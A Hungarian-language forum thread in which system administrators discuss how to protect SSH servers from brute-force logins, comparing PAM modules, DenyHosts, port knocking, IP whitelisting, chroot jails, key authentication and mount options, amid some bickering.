Hozzászólások
Esetleg figyelni, hogy mit csinál az, aki már belépett? Tegyük fel, hogy pistuka belépett rendesen vagy brute-force-val lényegtelen, de nem egyből basht kap, hanem valami fake shellt, azzal nagyon szépen el tud játszani, de ha sokáig nem írja be/sokszor elrontja a "parancsot", ami indítja a rendes bash-t, akkor az IP megy blacklistre xyz percre.
- A hozzászóláshoz be kell jelentkezni
http://mbsd.msk.ru/stas/pam_af.html
This PAM module is intended to prevent brute-force attacks on services like SSH or telnet. It maintains internal counters, and can execute pre-configured actions when failed attempt's count exeeds limit.
- A hozzászóláshoz be kell jelentkezni
En mondjuk a pam_tally -t hasznalom erre !
http://sial.org/howto/linux/pam_tally/
http://www.redhat.com/archives/pam-list/2005-July/msg00012.html
http://www.baverstock.org.uk/tim/pam/pam_tally/ <-- forras
Szal tobb megoldas is letezik !
- A hozzászóláshoz be kell jelentkezni
[quote:ed56a6c508="1aca"][quote:ed56a6c508="muszashi"]Ja és az alapokat majdnem elfelejtettem, ilyenek például:
/usr /bin /sbin /etc -ro
Hat ez sokat nem er, mert ha nem egybol root, akkor ugysem tud oda irogatni... Remelhetoleg ;) Ha pedig egybol root, akkor ugyis mindegy...
[quote:ed56a6c508="muszashi"]
/home /var/log -noexec
Na ez igen... De a tmp is bekerulhetne...
[quote:ed56a6c508="muszashi"]
Szóval egy jó fstab fájl, már fél siker.
Üdv: M.
Egyetertek :)
Persze a tmp is, ez csak példa volt, azért volt ott a stb ...
..és ugye lehetne itt még a kedvenc további kapcsolóim is nodev, nosuid
- A hozzászóláshoz be kell jelentkezni
[quote:ffc35032d4="meditor"]Apafej, egy ugrókódos kommunikációba az hallgat bele aki akar, akkor
sem tud egy ilyen csatornán bejönni, ha bitről bitre megismétli azt
az adást, amit előzőleg én nyomtam. Másfelöl meg nem az oroszlánnál
akarok gyorsabban futni, hanem a fehérembernél. Az általam írt
megoldás az ssh ellen induló támadások döntő többségét kizárja.
Látom továbbra sem sikerült megérteni a lényeget. Ugrókódozzál csak, az autótolvajok is jól mulatnak az ilyen autóriasztókon.
- A hozzászóláshoz be kell jelentkezni
[quote:b45406bec3="spymorass"][quote:b45406bec3="muszashi"]A mezei userek számára ahol szükség van scp,sftp-re, ott nekik csak ez van, de csak chroot-ba (rssh-val), akinek meg shell kell, azok is csak chroot-ba érkeznek.
Az rssh és az scponly között valami lényeges különbség van? Ahogy nézegettem az rssh oldalát, mindkettő ugyanarra a dologra hivatott.
Szerintem nincsen, de én csak az rssh-t használom, így ez nem biztos.
Amit tud: külön (akár userenként) lehet szabályozni, hogy csak scp vagy sftp vagy mindkettő, vagy minden, ráadásul chroot-ba lehet a fentieket csukni.
- A hozzászóláshoz be kell jelentkezni
Sziasztok!
Én mint kezdő linuxos úgy gondolom, hogy aki shellt kap abban vagy bízik az ember vagy nem. Olyan azért nincs hogy senkiben sem, mert feltételezem aki be tud ssh znia serverre abban megbízik az ember, míg az ellenkezője be nem bizonyosodik. :x Nálunk a serveren a root jelszó jól ki van találva ezt próbálták megtörni nem tudták, az ssh- scannel ugyan próbálkozások voltak de még időben észrevettük, lényegében szerintem az a fontos hogy figyeljünk a serverre. A serverre roottal közvetlen nem lehet be ssh ni, és a portok is eléggé zártak csak ami muszáj van nyítva, de próbálkozások így is vannak és szerintem lesznek is. A rendszergazda feladata az hogy kiszűrje az ilyen tevékenységeket, mert ha nem lennének ilyenek valószínű rendszergazdára sem nagyon lenne szükség. :roll: A védelmet persze erősíteni kell.
- A hozzászóláshoz be kell jelentkezni
nálam /etc/hosts.deny:
sshd: all
allow-ban meg annak az ipje akit beengedek.
- A hozzászóláshoz be kell jelentkezni
[quote:ba0e7a957c="csillagocska"]Sziasztok!
Én mint kezdő linuxos úgy gondolom, hogy aki shellt kap abban vagy bízik az ember vagy nem. Olyan azért nincs hogy senkiben sem, mert feltételezem aki be tud ssh znia serverre abban megbízik az ember, míg az ellenkezője be nem bizonyosodik. :x Nálunk a serveren a root jelszó jól ki van találva ezt próbálták megtörni nem tudták, az ssh- scannel ugyan próbálkozások voltak de még időben észrevettük, lényegében szerintem az a fontos hogy figyeljünk a serverre. A serverre roottal közvetlen nem lehet be ssh ni, és a portok is eléggé zártak csak ami muszáj van nyítva, de próbálkozások így is vannak és szerintem lesznek is. A rendszergazda feladata az hogy kiszűrje az ilyen tevékenységeket, mert ha nem lennének ilyenek valószínű rendszergazdára sem nagyon lenne szükség. :roll: A védelmet persze erősíteni kell.
ahahaha leccives ezt legkozelebb a fun kategoriaba mert eppen ittam es felrenyeltem
- A hozzászóláshoz be kell jelentkezni
[quote:02c8507a29="zaphodb"]nálam /etc/hosts.deny:
sshd: all
allow-ban meg annak az ipje akit beengedek.
És mit csinálsz azzal, aki nem fix ipről kell, hogy belépjen?
- A hozzászóláshoz be kell jelentkezni
Az nem lep be. Hasznaljon erre a celra olyan gepet aminek van fix IP-je (tovabb SSH-zas). Ha ilyen sincs neki, akkor nyaljon sot. :-)
[quote:34e30a7791="meditor"]És mit csinálsz azzal, aki nem fix ipről kell, hogy belépjen?
- A hozzászóláshoz be kell jelentkezni
Faraszto volt vegig olvasni ezt a topikot es meg azt sem mondhatom, hogy tanulsagos.
Valaki irta a ISP -> (Router+Tuzfal+SERVERFARM) hasznalatat. nalam valahogy igy nez ki a ceg, de ez sem vedelem. Mivel bejon a tuzfalra lepingeli a boardcast-ot es mindent tud a gepekrol (mert aztan rajuk nyom egy nmap-ot).
Szal az ellen nem ved ! :)
Mondjuk nalam ez azzal van megspekelve, hogy ssh le van zarva kintrol.
Es nem csak a kulso halo hanem a belso is, kiveve az en laptopomat.
Ennek egyszeru az oka, a halomon log egy par AP is.
A masik amivel csokkenteni lehet a karokat (nem a betoreseket!!!!) ahany szolgaltatas annyi szerver.
Megbizhato/megbizhatatlan user:
megbizhato nem letezik addig amig a user felirja a monitorara vagy a jegyzetfuzetebe a jelszavat. lehet a legkiralyabb gangbang pajtid is, akkor is megbizhatatlan, mivel nem a te usereden keresztul hanem az Oven jonnek majd be.
En a user mentes szerverekben hiszek. Ha kell user az akkor legyen virtual, es ahhoz legyen joga ami kell neki. nameg a user able legyen naprakesz, ha a kollegat kirugjak mert <nemtom> akkor ne legyen mar acca a szerverhez. Persze erre is vannak kozpontilag adminolhato megoldasok (foleg a fizetos cegeknel) ahol kozpontilag adminoljak a usert mar a munkaugyon.
Na jo, nem farasztom tovabb magam, inkabb vissza megyek szivni kedvenc compaq szerveremhez. :)
- A hozzászóláshoz be kell jelentkezni
[quote:360537e45d="trey"]Az nem lep be. Hasznaljon erre a celra olyan gepet aminek van fix IP-je (tovabb SSH-zas). Ha ilyen sincs neki, akkor nyaljon sot. :-)
[quote:360537e45d="meditor"]És mit csinálsz azzal, aki nem fix ipről kell, hogy belépjen?
Igen talál egy fix ip-s gépet amiről be tudna lépni, de ott is lekorlátozzák, hogy csak fix ip-ről léphet be. Nyalom a sót :-D
- A hozzászóláshoz be kell jelentkezni
[quote:795cece639="trey"]Az nem lep be. Hasznaljon erre a celra egy bouncer gepet, aminek van fix IP-je. Ha ilyen sincs neki, akkor nyaljon sot. :-)
[quote:795cece639="meditor"]És mit csinálsz azzal, aki nem fix ipről kell, hogy belépjen?
Köszi, akkor nyalom. Az usereim meg forduljanak fel, ha gondjuk van. :) ..mondjuk ettől függetlenül tényleg. :) ...ma úgyis erős a napfolttevékenység.
Na szórok egy kis vasreszeléket a monitorba.
Üdv: M.
- A hozzászóláshoz be kell jelentkezni
[quote:fb7a3953a7="meditor"][quote:fb7a3953a7="zaphodb"]nálam /etc/hosts.deny:
sshd: all
allow-ban meg annak az ipje akit beengedek.
És mit csinálsz azzal, aki nem fix ipről kell, hogy belépjen?
:-) az van, szóval ez csak az otthoni gépem
szóval akinek nincs szép biztonságos ip range-e az nem lép be:)
- A hozzászóláshoz be kell jelentkezni
[quote:c2fda28144="meditor"]
Apafej, egy ugrókódos kommunikációba az hallgat bele aki akar, akkor
sem tud egy ilyen csatornán bejönni, ha bitről bitre megismétli azt
az adást, amit előzőleg én nyomtam. Másfelöl meg nem az oroszlánnál
akarok gyorsabban futni, hanem a fehérembernél. Az általam írt
megoldás az ssh ellen induló támadások döntő többségét kizárja.
Nem ertem, miert kell elbonyolitani... Az ssh ellen iranyulo tamadasok donto tobbseget a pubkey auth is megoldja, sokkal egyszerubben es biztonsagosabban.
- A hozzászóláshoz be kell jelentkezni
erre talaltak fel a knockd -t mondjuk!
Ja + nem ssh porton figyel stb..
- A hozzászóláshoz be kell jelentkezni
[quote:959a1fa199="hunger"][quote:959a1fa199="meditor"]Apafej, egy ugrókódos kommunikációba az hallgat bele aki akar, akkor
sem tud egy ilyen csatornán bejönni, ha bitről bitre megismétli azt
az adást, amit előzőleg én nyomtam. Másfelöl meg nem az oroszlánnál
akarok gyorsabban futni, hanem a fehérembernél. Az általam írt
megoldás az ssh ellen induló támadások döntő többségét kizárja.
Látom továbbra sem sikerült megérteni a lényeget. Ugrókódozzál csak, az autótolvajok is jól mulatnak az ilyen autóriasztókon.
Ha jól látom ezek itt ötletek. Fikázni mindenki tudd. Ha tudsz olyan megoldást, ami "megtörhetetlen", akkor mond, de olyat amitől a rendszer használható marad és nem egy lebetonozott pincében ücsörög a Rendzergazda, minden hálózattól elzárcva.
- A hozzászóláshoz be kell jelentkezni
Elmondom mire gondolok:
Sok helyen csinaljak azt, hogy van egy masik gep az eles gep elott. Az viszonylag szabadabban konfiguralt, azaz elfogad ssh kapcsolatot barhonnan, kulccsal vagy jelszoval. Persze ez a gep semmit sem csinal, van rajta egy ures chroot vagy jail, aztan kesz. Mogotte privat halon van az eles gep, amire at lehet SSH-zni a kulso geprol. Igy ket helyrol lehet elerni az eles gepet. Vagy egy masik szuro gepen keresztul, vagy az internetrol, de csak fix IP-rol. A biztonsagnak ara van.
Mondjuk nem tiszta, hogy egy fontos gepen miert van local user az adminon kivul akinek el kell erni a gepet? Jatszos gepen (free shell, irc, stb.) meg fel kell keszulni arra, hogy szoftver hiba miatt felpattintjak. Ott csak okor tarol fontos adatot.
[quote:4aa1387479="muszashi"][quote:4aa1387479="trey"]Az nem lep be. Hasznaljon erre a celra egy bouncer gepet, aminek van fix IP-je. Ha ilyen sincs neki, akkor nyaljon sot. :-)
[quote:4aa1387479="meditor"]És mit csinálsz azzal, aki nem fix ipről kell, hogy belépjen?
Köszi, akkor nyalom. Az usereim meg forduljanak fel, ha gondjuk van. :) ..mondjuk ettől függetlenül tényleg. :) ...ma úgyis erős a napfolttevékenység.
Na szórok egy kis vasreszeléket a monitorba.
Üdv: M.
- A hozzászóláshoz be kell jelentkezni
[quote:c7ef4f1e10="snowflake"][quote:c7ef4f1e10="WatchDog"]A sok hasznos hozzaszolason kivul esetleg lehetne olyat is csinalni iptables-el, hogy egy adott iprol egy adott idointervallumon belul hanyszor csatlakozhat vki. Esetleg vmi szkript, ami sok probalkozas utan tempban-ra teszi az illetot, amit aztan egy bizonyos ido elteltevel leszedi...vagy otthagyja, es majd kezzel kell kiszedni a blacklist-bol.
Én otthon ezt használom a próbálkozók ellen:
http://denyhosts.sourceforge.net/
lehet, hogy én nem értek valamit, de ennek a denyhost purge funkciójának a leírása nem hülyeség egy kicsit?
lévén azt írja, hogy ha legalább egy elem nem lett átmozdítva a .purge.tmp -be, akkor nem csinál semmit, ha pedig mindegyik át lett mozgatva akkor visszacsinálja :)) ennek mi értelme???
hülyeség a fakuban
- A hozzászóláshoz be kell jelentkezni
[quote:edd4578fff="csillagocska"]Sziasztok!
Én mint kezdő linuxos úgy gondolom, hogy aki shellt kap abban vagy bízik az ember vagy nem. Olyan azért nincs hogy senkiben sem, mert feltételezem aki be tud ssh znia serverre abban megbízik az ember, míg az ellenkezője be nem bizonyosodik. :x
Kár hogy hasonlatokat nem hoztál. Pl.: csak azzal fexel le gumi nélkül akiben megbízol és hasonlók. :P
[quote:edd4578fff="csillagocska"]Nálunk a serveren a root jelszó jól ki van találva ezt próbálták megtörni nem tudták
Nemsemmi... gondolom iszonyat brainstorming lehetett jól kitalálni egy root jelszót. :lol:
[quote:edd4578fff="csillagocska"]A rendszergazda feladata az hogy kiszűrje az ilyen tevékenységeket, mert ha nem lennének ilyenek valószínű rendszergazdára sem nagyon lenne szükség. :roll:
És akkor aztán már végképp a villanyszerelő nagypapa és a hűtőgépszerelő józsi tervezné és telepítené a rendszert a bankoknál is.
[quote:edd4578fff="csillagocska"]A védelmet persze erősíteni kell.
Hú, hát a szívemből beszélsz! :D
- A hozzászóláshoz be kell jelentkezni
A "port kopogtatás" lehet egy megoldás a biztonságos SSH kapcsolatra.
Egy Linuxvilágban olvastam róla. A lényege a következő, már amennyire emlékszem rá:A kliens kopogtat egy megadott porton előre beállított számú kopogtatással, majd vár egy szintén előre megadott ideig és újra kopogtat. Ekkor a szerver amennyiben szabályos kopogtatást érzékel indítja az adott szolgáltatást és ha bizonyos időn belül nem jön létre a kapcsolat, akkor ismét leállítja. A szabályos kapcsaolat bontása után szintén leállítja az adott szolgáltatást.
No ez a problámám, hogy most sem találom, hogy melyik Linuxvilágban volt. Pedig én is hasonló cipőben járok és a logjaim is tele vannak módszeres és intenzív próbálkozásokkal.
- A hozzászóláshoz be kell jelentkezni
Hoppá! Nem is a Linuxvilágban volt!
http://blog.linuxforge.hu/?page_id=12
És itt a HUP-on volt hír 2005. Szeptember 14.-én: http://www.hup.hu/modules.php?name=News&file=article&sid=9670&mode=nested
- A hozzászóláshoz be kell jelentkezni
[quote:6dfdab39b9="1aca"][quote:6dfdab39b9="meditor"]
Apafej, egy ugrókódos kommunikációba az hallgat bele aki akar, akkor
sem tud egy ilyen csatornán bejönni, ha bitről bitre megismétli azt
az adást, amit előzőleg én nyomtam. Másfelöl meg nem az oroszlánnál
akarok gyorsabban futni, hanem a fehérembernél. Az általam írt
megoldás az ssh ellen induló támadások döntő többségét kizárja.
Nem ertem, miert kell elbonyolitani... Az ssh ellen iranyulo tamadasok donto tobbseget a pubkey auth is megoldja, sokkal egyszerubben es biztonsagosabban.
Nézd, sokféle megoldás létezhet ugyanarra a problémára. Amit én
javasoltam, annak az a lényege, hogy az ssh csak akkor fut, amikor én
akarom. Ez szerintem nem rossz alapgondolat, ugyanis logikailag
teljesen kizárja hogy támadást indítsanak ellene. Azon lehet vitatkozni,
hogy milyen módon aktiválod, illetve deaktiválod. Hungernek annyiban
igaza van, hogy nem szerencsés az aktiválást ugyanazon a csatornán
végrehajtani.
- A hozzászóláshoz be kell jelentkezni
[quote:727c99489b="dirobi"]Ha jól látom ezek itt ötletek. Fikázni mindenki tudd. Ha tudsz olyan megoldást, ami "megtörhetetlen", akkor mond, de olyat amitől a rendszer használható marad és nem egy lebetonozott pincében ücsörög a Rendzergazda, minden hálózattól elzárcva.
Már elmondtam, csak ezek szerint te sem figyelsz...
Az ilyen barkács megoldásoknak semmi értelme. Amelyik gépen előfordulhat proba user proba jelszóval ott nincs megfelelő policy. Először ezen kellene elgondolkozni, nem pedig sufni megoldásokat kitalálni. Biztos nagyon jó védelem, hogy az sshd csak akkor fut, amikor be akar jelentkezni rá valaki, de vegyük észre, hogy ez is csak az idler szervereken működik. Ahol van néhány user akik naponta többször bejelentkeznek ott állandóan futnia kell és semmi sem garantálja, hogy legközelebb nem egy másik szolgáltatáson mennek be. Hiába van rács az ajtó előtt, ha nyitva van a pinceablak. A statisztikák alapján egyébként sem ssh-n történik a legtöbb betörés.
- A hozzászóláshoz be kell jelentkezni
[quote:bc5e512fea="trey"]Elmondom mire gondolok:
Sok helyen csinaljak azt, hogy van egy masik gep az eles gep elott. Az viszonylag szabadabban konfiguralt, azaz elfogad ssh kapcsolatot barhonnan, kulccsal vagy jelszoval. Persze ez a gep semmit sem csinal, van rajta egy ures chroot vagy jail, aztan kesz. Mogotte privat halon van az eles gep, amire at lehet SSH-zni a kulso geprol. Igy ket helyrol lehet elerni az eles gepet. Vagy egy masik szuro gepen keresztul, vagy az internetrol, de csak fix IP-rol. A biztonsagnak ara van.
Mondjuk nem tiszta, hogy egy fontos gepen miert van local user az adminon kivul akinek el kell erni a gepet? Jatszos gepen (free shell, irc, stb.) meg fel kell keszulni arra, hogy szoftver hiba miatt felpattintjak. Ott csak okor tarol fontos adatot.
[quote:bc5e512fea="muszashi"][quote:bc5e512fea="trey"]Az nem lep be. Hasznaljon erre a celra egy bouncer gepet, aminek van fix IP-je. Ha ilyen sincs neki, akkor nyaljon sot. :-)
[quote:bc5e512fea="meditor"]És mit csinálsz azzal, aki nem fix ipről kell, hogy belépjen?
Köszi, akkor nyalom. Az usereim meg forduljanak fel, ha gondjuk van. :) ..mondjuk ettől függetlenül tényleg. :) ...ma úgyis erős a napfolttevékenység.
Na szórok egy kis vasreszeléket a monitorba.
Üdv: M.
Hát mert pl. a tárhelyüket el kell érniük távolról, stb. Persze nem a NASA, de azért vannak fontos cuccok. Itt ennyi volt, ebből kellett kihozni a maximot. Végül is szerintem a ssh kulcsok használata elégséges kompromisszum a használhatóság és a biztonság között. Na még a -oPort=54421 is belefér a konfortos használatba. Én inkább arra használtam a gépet, amit eléraktam, hogy tűzfal legyen, mert a routert a beépített csomagszűréssel kevésnek találtam. (de pl a routert csak a szerver felől lehet elérni, tehát bemegyek a továbbított porton a szerverre ssh-val a routeren és a tűzfalon át és onnan tudok csak bejelentkezni a routerre. Így a routert állítgatni csak kulcs és jelszó ismeretében lehet. -meg a tűzfalat is persze)
De egyébként egyetértek elméletben, de ez van gyakorlatban. A kulcsomat meg mindig viszem magammal pendrivével (+knoppix CD), mivel azt könnyebb hordozni, mint egy fix IP-t!
Üdv: M.
- A hozzászóláshoz be kell jelentkezni
[quote:da6e0700b4="hunger"] A statisztikák alapján egyébként sem ssh-n történik a legtöbb betörés.
Hanem hol?
- A hozzászóláshoz be kell jelentkezni
Egészségedre ha ittál, és remélem nagyon nem csúszott félre. 8) Én csupán azt írtam le amit tapasztaltam és a véleményem a témához. Te biztos jóval okosabb és ügyesebb vagy mint más. 8) Én nem szégyellek másoktól tanulni, és kérdezni.
- A hozzászóláshoz be kell jelentkezni
- A hozzászóláshoz be kell jelentkezni
honnan?
korod?
F/L?
képed van?
:P
- A hozzászóláshoz be kell jelentkezni
[quote:450673a09d="suti"]ehhez az ssh töréshez lenne egy kérdésem! sokat tapasztaltam auth.log -ban, hogy tetszőleges ipkről próbálkoznak belépéssel a gépre, több usert, több jelszóval, majd továbbállnak! nem tud valaki olyan ssh configot, ami 3 sikertelen belépés után letiltja az ipt egy percig? vagy akármi hasonló is érdekelne!
örülök, hogy elolvastad a hozzászólásod felelett kb 10 üzivel feljebb levő hozzászólásomat...
- A hozzászóláshoz be kell jelentkezni
Jajj drastik és hunger akkor arcotok van, ha elmentek az 5cm-es tévém előtt már akkor is lemaradok 2 sorozatról 8)
Egyébként meg itt arról van szó, hogy hogyan lehet úgy biztonságosság tenni egy rendszert, hogy az ne menjen a használhatóság rovására. Vazz nem óhajtok minden egyes belépés előtt sms-t küldeni, portot kopogtatni ssh tunneleken keresztül a 20-ik proxy szerveren keresztül áthatolni, hogy egy ps parancsot ki tudjak adni a szerveren.
Valahogy kompromisszumokat keresünk a totális biztonság és használhatóság között.
Ha fikázást akarok akkor a flame rovatban nyitok topicot. Ha nincs értelmes hozzászólás akkor lehet alapba állítani a szájakat és ujjakat.
- A hozzászóláshoz be kell jelentkezni
előre: nem olvastam végig az egészet.
Az ssh-s próbálgatásra viszont van ellenszer még akkor is, ha bárhonnan lehetségesnek kell lennie a csatlakozásnak:
http://tuxworld.homelinux.org:81/blacklist/
Az oldalon cron-script kezeli az auth.log-ot és a "csűnya" címeket adatbázisba rakja, ami blacklist is egyben. Ha egyszer be is tudott jelentkezni valaki sokszoros próbálkozásra, akkor is bekerül a címe/tartománya a blacklistre.
- A hozzászóláshoz be kell jelentkezni
[quote:3f08fbdc26="csillagocska"]Egészségedre ha ittál, és remélem nagyon nem csúszott félre. 8) Én csupán azt írtam le amit tapasztaltam és a véleményem a témához. Te biztos jóval okosabb és ügyesebb vagy mint más. 8) Én nem szégyellek másoktól tanulni, és kérdezni.
A rendszergazda szerinted hogy tudja "figyelni a rendszert"? Ezt fejtsed ki légyszives, különös tekintettel arra, hogy napi 24 órában állandóan és _bármilyen_ megtörési kisérletet azonnal észrevegyen. Mondjuk amíg megebédelsz bedarálják a gépet egy rossz beállítás miatt (amiről csak később derül ki, hogy rossz persze). Ilyenkor mivan? Nem szűrted ki, mert lame vagy? Publikus webszerveren ennél is jobb a helyzet, mert a juzerek mindent szeretnének, ami azzal jár, hogy a phpBB és pl. mambo exploitok is lefuthatnak. Legszebb, hogy nem is biztos, hogy észreveszed a néhány száz processben azt aki épp lappang.
A rossz shellbe írt "su -" -t pedig már szerintem sokan elkövettük és még mindíg élünk.
- A hozzászóláshoz be kell jelentkezni
[quote:3879eca281="hunger"]Már elmondtam, csak ezek szerint te sem figyelsz...
Az ilyen barkács megoldásoknak semmi értelme. Amelyik gépen előfordulhat proba user proba jelszóval ott nincs megfelelő policy. Először ezen kellene elgondolkozni, nem pedig sufni megoldásokat kitalálni. ...
Először is bocs, a kirohanásomért, de valahogy morcos voltam tegnap és mivel inkább fikáztál (főleg drastik kolléga) ezért írtam amit írtam... Na mindegy fátylat rá, ha lehet.
Tehát a biztonság alapjai:
1. Alapból mindent tiltunk amit nem engedünk meg, tehát elejét vesszük, hogy bármi is be/ki kommunikáljon.
2. A rendszergazdán kivül lokális júzer csak is nagyon indokolt esetben van, és az is jól elszeparálva (chroot, jail etc)
3. SSH ha lehetséges nem ismert porton fut és publikus kulcs hozzáféréssel érhető csak el.
4. A fontos és futó szolgáltatások nem root joggal futnak és állandóan up-to-date állapotban vannak biztonsági szempontból
5. A security értesítők folyamatos figyelése (lehetséges hibák kiszűrése céljából)
6. Állandó mentés a fontos adatokról.
7. A rendszer folyamatos követése és a változásokról azonnali értesítés, gondolok itt arról, hogy valaki belépett a rendszerbe kiadott egy su parancsot etc..
8...???
Nagyjából ennyi ami az alapokat érinti és ezt lehet még a végtelenségig fokozni???
- A hozzászóláshoz be kell jelentkezni
[quote:7171a9a4fc="hunger"]honnan?
korod?
F/L?
képed van?
:P
arcod?
van képed hozzá?
:lol:
- A hozzászóláshoz be kell jelentkezni
[quote:d2706578fe="bitumen"]előre: nem olvastam végig az egészet.
Az ssh-s próbálgatásra viszont van ellenszer még akkor is, ha bárhonnan lehetségesnek kell lennie a csatlakozásnak:
http://tuxworld.homelinux.org:81/blacklist/
Az oldalon cron-script kezeli az auth.log-ot és a "csűnya" címeket adatbázisba rakja, ami blacklist is egyben. Ha egyszer be is tudott jelentkezni valaki sokszoros próbálkozásra, akkor is bekerül a címe/tartománya a blacklistre.
...aztán, ha legközelebb Te kapsz onnan IP-t , akkor meg nyalod a sót. :)
Pl, én monornetes vagyok, és itt is van sok idióta a hálózatban. (Küldtem is párszor próbálkozó IP időpont párosokat a szolgáltatónak, nem érdekelte, még csak nem is válaszolt. -bűnpártolás?) Ha ilyesmit alkalmaznék a szerveren könnyen lehet, hogy holnap én kapnám meg a címet, amiről tegnap a barom próbálkozott. ...és akkor nyalhatnék. :)
Üdv: M.
- A hozzászóláshoz be kell jelentkezni
[quote:0e96552037="andrej_"][quote:0e96552037="csillagocska"]Egészségedre ha ittál, és remélem nagyon nem csúszott félre. 8) Én csupán azt írtam le amit tapasztaltam és a véleményem a témához. Te biztos jóval okosabb és ügyesebb vagy mint más. 8) Én nem szégyellek másoktól tanulni, és kérdezni.
A rendszergazda szerinted hogy tudja "figyelni a rendszert"? Ezt fejtsed ki légyszives, különös tekintettel arra, hogy napi 24 órában állandóan és _bármilyen_ megtörési kisérletet azonnal észrevegyen. Mondjuk amíg megebédelsz bedarálják a gépet egy rossz beállítás miatt (amiről csak később derül ki, hogy rossz persze). Ilyenkor mivan? Nem szűrted ki, mert lame vagy? Publikus webszerveren ennél is jobb a helyzet, mert a juzerek mindent szeretnének, ami azzal jár, hogy a phpBB és pl. mambo exploitok is lefuthatnak. Legszebb, hogy nem is biztos, hogy észreveszed a néhány száz processben azt aki épp lappang.
A rossz shellbe írt "su -" -t pedig már szerintem sokan elkövettük és még mindíg élünk.
A figyelést szerintem nem szó szerint kell érteni, hogy állandóan azt nézem, hogy milyen processzek indulnak és állnak le... SZVSZ
- A hozzászóláshoz be kell jelentkezni
azt nem lehet megcsinálni, hogy a sshzó ip-t összevetem egy dyndns host-al? ha egyezik (a feloldása), akkor kb ugyanott vagyunk, mintha csak a fix ip-t engednéd be.
- A hozzászóláshoz be kell jelentkezni
[quote:d8c0f01a72="_Polesz_"]Valahogy kompromisszumokat keresünk a totális biztonság és használhatóság között.
Erről pedig tudod hogy nem létezik. Keresni mondjuk lehet ettől még. Vagy magasfokú biztonság vagy jó használhatóság van. A kettő együtt általában nem vagy nagyon erős kompromisszumokkal megy (ami már csökkent használhatóságot és biztonságot jelent).
Egy adott rendszer védelménél mérlegelni kell a fontosságát és értékét, illetve hogy a védelmére fordított energia összhangban van-e az első kettővel. Ez alapján lehet (és kell) az arra megfelelő védelmet kitalálni és megvalósítani.
A shelluserezésről meg annyit, hogy vannak olyan "haveri gépek" általában mindenkinek a látókörében, amire "bennfentesek" kapnak shellt. Igazán éles gépekre pedig senki olyan akinek nem létkérdés nem kaphat a szükségesnél tobb jogot, beleértve a fölösleges accountokat.
- A hozzászóláshoz be kell jelentkezni
@muszashi
Igen, ebben van igazság. A megoldás egy whitelist (amiben természetesen localhost is benne van). Nálam már jó ideje működik a dolog és egyre kevesebb próbálkozás van.
2 év alatt egyszer volt olyan, hogy egy user nem tudott csatlakozni, mert tiltott volt a tartomány. Ekkor ment a címe a whitelistbe... (ami ugye akár dinamikus is lehet...)
- A hozzászóláshoz be kell jelentkezni
[quote:4b5a769f59="wlaszi"]azt nem lehet megcsinálni, hogy a sshzó ip-t összevetem egy dyndns host-al? ha egyezik (a feloldása), akkor kb ugyanott vagyunk, mintha csak a fix ip-t engednéd be.
Erre én is kiváncsi lennék.
- A hozzászóláshoz be kell jelentkezni
Na, hogy kicsit komolyabb irányba visszatereljük a szót, nálam például E-mailek jönnek a szerverektől. Nem sok, ert azt nem olvasnám, de ami biztosan jön minden nap:
* napi mentésről egy eredmény, alap esetben egy idő+dátum+ellenörző összeg OK, ha nem így lenne, akkor részletes napló. (ez tuóbbi fájlba mindig elkészül) Ez hajnali 1-2 felé jön, leghamarabb reggel nézem. ..hacsak nem szuttyogok az éjjszaka.
* rendszer integritás állapotáról naponta 6:25-kor. (Ez az összes fontos fájl változását figyeli és küldi az eredményt. Mely fájlok, mikor módosultak. .persze nem /var/log meg /home :)
Áramszünet esetén jön a mail, ha visszajött az áram, akkor is.
Ennyi jön. Ezen kívül minden nap 1X be SSH-zok a szerverekre, szúrópróbaszerűen megnézek 1-2 naplót, nézek egy apt-get update -t, ilyesmit. Tehát kicsit élvezem az üzemeltetést. Ennél többször csak akkor lépek be, ha kell valamit csinálni, vagy nem jön meg valamelyik usernek mail és meg kell nézni a naplóban, hogy miért. (utána meg
telefonálnom kell, hogy mit állítson be a küldő a szerverén, vagy a DNS-én :)
Üdv: M.
- A hozzászóláshoz be kell jelentkezni
[quote:216f5a3640="_Polesz_"][quote:216f5a3640="andrej_"][quote:216f5a3640="csillagocska"]Egészségedre ha ittál, és remélem nagyon nem csúszott félre. 8) Én csupán azt írtam le amit tapasztaltam és a véleményem a témához. Te biztos jóval okosabb és ügyesebb vagy mint más. 8) Én nem szégyellek másoktól tanulni, és kérdezni.
A rendszergazda szerinted hogy tudja "figyelni a rendszert"? Ezt fejtsed ki légyszives, különös tekintettel arra, hogy napi 24 órában állandóan és _bármilyen_ megtörési kisérletet azonnal észrevegyen. Mondjuk amíg megebédelsz bedarálják a gépet egy rossz beállítás miatt (amiről csak később derül ki, hogy rossz persze). Ilyenkor mivan? Nem szűrted ki, mert lame vagy? Publikus webszerveren ennél is jobb a helyzet, mert a juzerek mindent szeretnének, ami azzal jár, hogy a phpBB és pl. mambo exploitok is lefuthatnak. Legszebb, hogy nem is biztos, hogy észreveszed a néhány száz processben azt aki épp lappang.
A rossz shellbe írt "su -" -t pedig már szerintem sokan elkövettük és még mindíg élünk.
A figyelést szerintem nem szó szerint kell érteni, hogy állandóan azt nézem, hogy milyen processzek indulnak és állnak le... SZVSZ
Nyilván, viszont akkor nemtudod figyelni, lásd a fenti félórás példát.
- A hozzászóláshoz be kell jelentkezni
[quote:0e361976c2="_Polesz_"]Jajj drastik és hunger akkor arcotok van, ha elmentek az 5cm-es tévém előtt már akkor is lemaradok 2 sorozatról 8)
Egyébként meg itt arról van szó, hogy hogyan lehet úgy biztonságosság tenni egy rendszert, hogy az ne menjen a használhatóság rovására. Vazz nem óhajtok minden egyes belépés előtt sms-t küldeni, portot kopogtatni ssh tunneleken keresztül a 20-ik proxy szerveren keresztül áthatolni, hogy egy ps parancsot ki tudjak adni a szerveren.
Valahogy kompromisszumokat keresünk a totális biztonság és használhatóság között.
Ha fikázást akarok akkor a flame rovatban nyitok topicot. Ha nincs értelmes hozzászólás akkor lehet alapba állítani a szájakat és ujjakat.
jajj, itt már mindenki ismeri az ilyen drasztikus kollégákat, a rutinos fórumozó egyszerűen csak skippeli az írását ... ;)
- A hozzászóláshoz be kell jelentkezni
[quote:bdfd6e4dc5="wlaszi"]azt nem lehet megcsinálni, hogy a sshzó ip-t összevetem egy dyndns host-al? ha egyezik (a feloldása), akkor kb ugyanott vagyunk, mintha csak a fix ip-t engednéd be.
Kb 1 éve próbáltunk ilyet, de "nem ment" és nem ástuk be magunkat a témába...
- A hozzászóláshoz be kell jelentkezni
[Off]Aztán az érzékeny adatokat kiviszik papíron. :lol:[/Off]
- A hozzászóláshoz be kell jelentkezni
